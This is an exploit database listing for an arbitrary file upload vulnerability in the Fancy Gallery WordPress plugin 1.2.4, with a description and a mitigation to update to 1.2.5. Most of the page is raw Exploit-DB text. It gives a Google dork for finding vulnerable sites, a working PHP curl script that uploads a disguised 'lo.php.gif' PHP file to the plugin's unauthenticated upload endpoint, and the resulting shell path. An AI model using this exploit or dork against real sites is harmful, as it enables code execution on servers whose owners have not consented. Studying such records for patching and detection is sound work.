header-logo
Suggest Exploit
vendor:
Fancy Gallery WordPress Plugin
by:
Sammy FORGIT
9,3
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Fancy Gallery WordPress Plugin
Affected Version From: 1.2.4
Affected Version To: 1.2.4
Patch Exists: YES
Related CWE: N/A
CPE: a:codecanyon:fancy_gallery_wordpress_plugin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2012

WordPress Plugins – Fancy Gallery Arbitrary File Upload Vulnerability

A vulnerability in the Fancy Gallery WordPress plugin allows an attacker to upload arbitrary files to the server. The vulnerability exists due to insufficient validation of user-supplied input in the 'image-upload.php' script, which is used to upload images to the server. An attacker can exploit this vulnerability by uploading a malicious file to the server. Successful exploitation of this vulnerability can result in arbitrary code execution on the vulnerable server.

Mitigation:

Update to version 1.2.5 or later.
Source

Exploit-DB raw data:

##################################################
# Description : Wordpress Plugins - Fancy Gallery Arbitrary File Upload Vulnerability
# Version : 1.2.4
# link : http://codecanyon.net/item/fancy-gallery-wordpress-plugin/400535
# Price : 18$
# Date : 22-06-2012
# Google Dork : inurl:/wp-content/plugins/radykal-fancy-gallery/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

<?php

$uploadfile="lo.php.gif";

$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php");

curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file[]'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/radykal-fancy-gallery/admin/
Filename : $postResult output

lo.php.gif
<?php
phpinfo();
?>

Navigation

Suggest Exploit

Services By CQR